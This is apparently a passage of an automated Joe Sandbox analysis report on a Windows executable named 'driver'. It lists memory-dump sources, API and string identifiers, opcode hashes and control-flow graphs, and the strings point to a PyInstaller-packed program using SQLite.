                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8
                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                • Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                                • Instruction ID: b4a91b8df81e8fe54c1de5d1cb109bd6afdbb190dae51a66343283e5ab6a6e99
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE516532A4A68286E754DF27E4815A96790FF48F8CF844135EA4DC7697DFBCE440A740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449432536.00007FF8A8619000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FF8A8110000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448106725.00007FF8A8110000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8111000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8122000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8132000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8138000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8182000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8197000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A81A7000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A81AE000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A81BC000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A839E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8489000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A848B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A84C2000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A84FF000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A85CB000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8600000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2448164791.00007FF8A8613000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449471266.00007FF8A861A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8110000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID: )tP
                                                                                                                                                                                                                                                • API String ID: 3300690313-3907340667
                                                                                                                                                                                                                                                • Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                • Instruction ID: 6721fd69a48f24947ee2015cb7efd0ceff5616b248f75f47e4cb2c09e7d9f552
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8162342262919296F719CF38D4082BD76A0F7487C5F486532EA9EC37C5EB3CEA45CB14
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                • API String ID: 22509725-1046679716
                                                                                                                                                                                                                                                • Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                                • Instruction ID: 8703a2527f961a333fd87da27e7aedc59724ac7ffa3aa12efb291ff25549464f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 02F1862290EB81A6FB24DF25D4087BA67A0FB857C8F086135DA4D07B95DF7CE885CB14
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3300690313-0
                                                                                                                                                                                                                                                • Opcode ID: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
                                                                                                                                                                                                                                                • Instruction ID: b21b307af4285b0f30c10336fde61704503777804dd34347db08b8ad2cd0ebc9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6622422A2A59297EB198E3AD40027D77D0FB487C5F045532EA9EC37C4EB3CEA55C714
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007F73010
                                                                                                                                                                                                                                                • String ID: :memory:
                                                                                                                                                                                                                                                • API String ID: 22509725-2920599690
                                                                                                                                                                                                                                                • Opcode ID: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
                                                                                                                                                                                                                                                • Instruction ID: 6b6e1172fe997fcfc7e7ab05b8c09822b803750580aac2adae50f0e4fbc467a1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4942A1A2A0E782A6FB658B25955837927A1FF45BC4F046135CE4F03B94DF3CE494C3A8
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction ID: 56e463ebe583f942e15888af9eb7f4b722ca1549162f02616e21b2b73093e953
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BF0C832A5E74187F7608B61B45976A7390BB88B2CF044335D9AD466D6DFBCD048AA00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InfoSystem
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 31276548-0
                                                                                                                                                                                                                                                • Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                                • Instruction ID: 89b1cdebdfdeca279819c5a07f656d8a047d925bb3350075531d7849c0d5eb79
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15A11A20E4BB87AAFE5D8B85A85C27422A6FF54BC0F545535C98F577A0DF3CE4908328

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 783 7ff6a29b1950-7ff6a29b198b call 7ff6a29b45b0 786 7ff6a29b1991-7ff6a29b19d1 call 7ff6a29b7f80 783->786 787 7ff6a29b1c4e-7ff6a29b1c72 call 7ff6a29bc5c0 783->787 792 7ff6a29b19d7-7ff6a29b19e7 call 7ff6a29c0744 786->792 793 7ff6a29b1c3b-7ff6a29b1c3e call 7ff6a29c00bc 786->793 798 7ff6a29b1a08-7ff6a29b1a24 call 7ff6a29c040c 792->798 799 7ff6a29b19e9-7ff6a29b1a03 call 7ff6a29c4f78 call 7ff6a29b2910 792->799 797 7ff6a29b1c43-7ff6a29b1c4b 793->797 797->787 804 7ff6a29b1a45-7ff6a29b1a5a call 7ff6a29c4f98 798->804 805 7ff6a29b1a26-7ff6a29b1a40 call 7ff6a29c4f78 call 7ff6a29b2910 798->805 799->793 813 7ff6a29b1a5c-7ff6a29b1a76 call 7ff6a29c4f78 call 7ff6a29b2910 804->813 814 7ff6a29b1a7b-7ff6a29b1afc call 7ff6a29b1c80 * 2 call 7ff6a29c0744 804->814 805->793 813->793 825 7ff6a29b1b01-7ff6a29b1b14 call 7ff6a29c4fb4 814->825 828 7ff6a29b1b35-7ff6a29b1b4e call 7ff6a29c040c 825->828 829 7ff6a29b1b16-7ff6a29b1b30 call 7ff6a29c4f78 call 7ff6a29b2910 825->829 834 7ff6a29b1b50-7ff6a29b1b6a call 7ff6a29c4f78 call 7ff6a29b2910 828->834 835 7ff6a29b1b6f-7ff6a29b1b8b call 7ff6a29c0180 828->835 829->793 834->793 843 7ff6a29b1b9e-7ff6a29b1bac 835->843 844 7ff6a29b1b8d-7ff6a29b1b99 call 7ff6a29b2710 835->844 843->793 847 7ff6a29b1bb2-7ff6a29b1bb9 843->847 844->793 849 7ff6a29b1bc1-7ff6a29b1bc7 847->849 850 7ff6a29b1be0-7ff6a29b1bef 849->850 851 7ff6a29b1bc9-7ff6a29b1bd6 849->851 850->850 852 7ff6a29b1bf1-7ff6a29b1bfa 850->852 851->852 853 7ff6a29b1c0f 852->853 854 7ff6a29b1bfc-7ff6a29b1bff 852->854 856 7ff6a29b1c11-7ff6a29b1c24 853->856 854->853 855 7ff6a29b1c01-7ff6a29b1c04 854->855 855->853 857 7ff6a29b1c06-7ff6a29b1c09 855->857 858 7ff6a29b1c26 856->858 859 7ff6a29b1c2d-7ff6a29b1c39 856->859 857->853 860 7ff6a29b1c0b-7ff6a29b1c0d 857->860 858->859 859->793 859->849 860->856
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B7F80: _fread_nolock.LIBCMT ref: 00007FF6A29B802A
                                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF6A29B1A1B
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                • Opcode ID: 11092ae5d3052ba6452cd45c37cd662638f4e64129f80c3c6bb932d78e9f91b0
                                                                                                                                                                                                                                                • Instruction ID: cb6eb3efc9c809685b3159172aaa5a70fe23eb464f4288205dfcd277276fc10c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 11092ae5d3052ba6452cd45c37cd662638f4e64129f80c3c6bb932d78e9f91b0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0681C171A4E6868AEB60DB26D0512B923A1EF48F8CF404435E98DC778BDFBCE545B740

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 375044d6be796fe755ab7c0157675cd7a81719d0168cdb53a9f361783af8d1d2
                                                                                                                                                                                                                                                • Instruction ID: c47f30c867e7c2ae03e0c6b327bd2d2e15bbf5d481107ccdd0e149c83a63f551
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 375044d6be796fe755ab7c0157675cd7a81719d0168cdb53a9f361783af8d1d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09417E22B8A6429AFA10DB23D4515B97391EF44F9CF444432ED4D87B97DFBCE542A700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1524 7ff8a86d4450-7ff8a86d4514 call 7ff8a86d4150 1527 7ff8a86d48c6-7ff8a86d48c9 1524->1527 1528 7ff8a86d451a-7ff8a86d4538 1524->1528 1529 7ff8a86d48d3-7ff8a86d48d6 call 7ff8a8656c40 1527->1529 1530 7ff8a86d48cb-7ff8a86d48d1 1527->1530 1531 7ff8a86d4552-7ff8a86d4556 1528->1531 1532 7ff8a86d453a-7ff8a86d454d 1528->1532 1533 7ff8a86d48db-7ff8a86d48e1 call 7ff8a86b1310 1529->1533 1530->1529 1530->1533 1536 7ff8a86d4566-7ff8a86d4572 1531->1536 1537 7ff8a86d4558-7ff8a86d455f 1531->1537 1535 7ff8a86d48ef-7ff8a86d490e call 7ff8a8782920 1532->1535 1546 7ff8a86d48e6-7ff8a86d48e8 1533->1546 1538 7ff8a86d4574-7ff8a86d4578 1536->1538 1539 7ff8a86d457e-7ff8a86d4582 1536->1539 1537->1536 1542 7ff8a86d4561 call 7ff8a866ff80 1537->1542 1538->1539 1543 7ff8a86d45fb-7ff8a86d4606 1538->1543 1544 7ff8a86d4584-7ff8a86d4588 1539->1544 1545 7ff8a86d458a-7ff8a86d458f call 7ff8a8673820 1539->1545 1542->1536 1551 7ff8a86d4610-7ff8a86d4627 call 7ff8a867d6f0 1543->1551 1544->1545 1549 7ff8a86d45f8 1544->1549 1552 7ff8a86d4594-7ff8a86d4598 1545->1552 1546->1535 1549->1543 1557 7ff8a86d4629-7ff8a86d4631 1551->1557 1552->1549 1554 7ff8a86d459a-7ff8a86d45a7 call 7ff8a87128c0 1552->1554 1561 7ff8a86d45de-7ff8a86d45e5 1554->1561 1562 7ff8a86d45a9 1554->1562 1559 7ff8a86d4633-7ff8a86d463c 1557->1559 1560 7ff8a86d463e 1557->1560 1563 7ff8a86d4641-7ff8a86d464f 1559->1563 1560->1563 1564 7ff8a86d45e7-7ff8a86d45ea call 7ff8a8656400 1561->1564 1565 7ff8a86d45ef-7ff8a86d45f3 1561->1565 1566 7ff8a86d45b0-7ff8a86d45b9 1562->1566 1567 7ff8a86d4705 1563->1567 1568 7ff8a86d4655-7ff8a86d4658 1563->1568 1564->1565 1570 7ff8a86d48a9-7ff8a86d48b1 1565->1570 1566->1566 1571 7ff8a86d45bb-7ff8a86d45cd call 7ff8a8656880 1566->1571 1574 7ff8a86d470a-7ff8a86d471d 1567->1574 1572 7ff8a86d4695-7ff8a86d469b 1568->1572 1573 7ff8a86d465a-7ff8a86d465f 1568->1573 1578 7ff8a86d48b3-7ff8a86d48b7 1570->1578 1579 7ff8a86d48be-7ff8a86d48c4 1570->1579 1571->1561 1600 7ff8a86d45cf-7ff8a86d45d9 00007FF8B9F73010 1571->1600 1572->1567 1577 7ff8a86d469d-7ff8a86d46b0 call 7ff8a8656880 1572->1577 1573->1572 1581 7ff8a86d4661-7ff8a86d4676 1573->1581 1575 7ff8a86d4753-7ff8a86d4766 1574->1575 1576 7ff8a86d471f-7ff8a86d4724 1574->1576 1585 7ff8a86d476c-7ff8a86d4774 1575->1585 1586 7ff8a86d4768 1575->1586 1582 7ff8a86d4736-7ff8a86d473d 1576->1582 1583 7ff8a86d4726-7ff8a86d472b 1576->1583 1606 7ff8a86d46e6-7ff8a86d46ed 1577->1606 1607 7ff8a86d46b2-7ff8a86d46e3 1577->1607 1578->1579 1587 7ff8a86d48b9 call 7ff8a866ff50 1578->1587 1579->1527 1579->1546 1589 7ff8a86d4678-7ff8a86d467b 1581->1589 1590 7ff8a86d468b-7ff8a86d4693 call 7ff8a86ba8b0 1581->1590 1595 7ff8a86d4740-7ff8a86d474e call 7ff8a8672ee0 1582->1595 1592 7ff8a86d4734 1583->1592 1593 7ff8a86d472d-7ff8a86d4732 1583->1593 1597 7ff8a86d4776-7ff8a86d4789 call 7ff8a8656880 1585->1597 1598 7ff8a86d47bc-7ff8a86d47be 1585->1598 1586->1585 1587->1579 1589->1590 1591 7ff8a86d467d-7ff8a86d467f 1589->1591 1590->1574 1591->1590 1601 7ff8a86d4681-7ff8a86d4686 1591->1601 1592->1582 1593->1595 1595->1575 1618 7ff8a86d47a2-7ff8a86d47a9 1597->1618 1619 7ff8a86d478b-7ff8a86d479d 1597->1619 1602 7ff8a86d47c0-7ff8a86d47c4 1598->1602 1603 7ff8a86d47cb-7ff8a86d4822 call 7ff8a8659180 call 7ff8a86ccfb0 1598->1603 1600->1561 1609 7ff8a86d489a-7ff8a86d489e 1601->1609 1602->1603 1610 7ff8a86d47c6 1602->1610 1625 7ff8a86d4827-7ff8a86d4839 1603->1625 1612 7ff8a86d46f7-7ff8a86d4700 1606->1612 1613 7ff8a86d46ef-7ff8a86d46f2 call 7ff8a8656400 1606->1613 1607->1606 1609->1570 1616 7ff8a86d48a0-7ff8a86d48a4 call 7ff8a8674c10 1609->1616 1610->1603 1612->1609 1613->1612 1616->1570 1622 7ff8a86d47b3-7ff8a86d47b7 1618->1622 1623 7ff8a86d47ab-7ff8a86d47ae call 7ff8a8656400 1618->1623 1619->1618 1622->1609 1623->1622 1626 7ff8a86d4846-7ff8a86d4848 1625->1626 1627 7ff8a86d483b-7ff8a86d4841 call 7ff8a8656400 1625->1627 1629 7ff8a86d4855-7ff8a86d4859 1626->1629 1630 7ff8a86d484a-7ff8a86d4850 call 7ff8a86ae520 1626->1630 1627->1626 1631 7ff8a86d4872-7ff8a86d4874 1629->1631 1632 7ff8a86d485b-7ff8a86d4870 call 